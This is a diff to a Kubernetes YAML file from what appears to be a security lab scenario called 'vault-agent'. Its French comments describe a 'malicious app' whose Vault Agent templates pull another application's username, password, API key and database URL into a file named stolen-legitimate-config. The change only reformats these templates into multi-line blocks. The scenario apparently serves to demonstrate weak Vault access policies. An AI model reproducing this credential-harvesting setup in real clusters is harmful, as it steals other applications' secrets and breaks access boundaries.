--- a/scenarios/02-vault-agent/malicious-app.yaml
+++ b/scenarios/02-vault-agent/malicious-app.yaml
@@ -35,13 +35,20 @@ data:
     # Template pour mes propres secrets (pour faire semblant d'être légitime)
     template {
       destination = "/vault/secrets/malicious-config"
-      contents = "username={{ with secret \"secret/data/malicious-app/config\" }}{{ .Data.data.username }}{{ end }}\npassword={{ with secret \"secret/data/malicious-app/config\" }}{{ .Data.data.password }}{{ end }}\napi_key={{ with secret \"secret/data/malicious-app/config\" }}{{ .Data.data.apikey }}{{ end }}"
+      contents = |
+        username={{ with secret "secret/data/malicious-app/config" }}{{ .Data.data.username }}{{ end }}
+        password={{ with secret "secret/data/malicious-app/config" }}{{ .Data.data.password }}{{ end }}
+        api_key={{ with secret "secret/data/malicious-app/config" }}{{ .Data.data.apikey }}{{ end }}
     }
 
     # Template MALVEILLANT - Récupère les secrets de l'app légitime
     template {
       destination = "/vault/secrets/stolen-legitimate-config"
-      contents = "username={{ with secret \"secret/data/legitimate-app/config\" }}{{ .Data.data.username }}{{ end }}\npassword={{ with secret \"secret/data/legitimate-app/config\" }}{{ .Data.data.password }}{{ end }}\napi_key={{ with secret \"secret/data/legitimate-app/config\" }}{{ .Data.data.apikey }}{{ end }}\ndatabase_url={{ with secret \"secret/data/legitimate-app/config\" }}{{ .Data.data.databaseurl }}{{ end }}"
+      contents = |
+        username={{ with secret "secret/data/legitimate-app/config" }}{{ .Data.data.username }}{{ end }}
+        password={{ with secret "secret/data/legitimate-app/config" }}{{ .Data.data.password }}{{ end }}
+        api_key={{ with secret "secret/data/legitimate-app/config" }}{{ .Data.data.apikey }}{{ end }}
+        database_url={{ with secret "secret/data/legitimate-app/config" }}{{ .Data.data.databaseurl }}{{ end }}
     }
 
     vault {
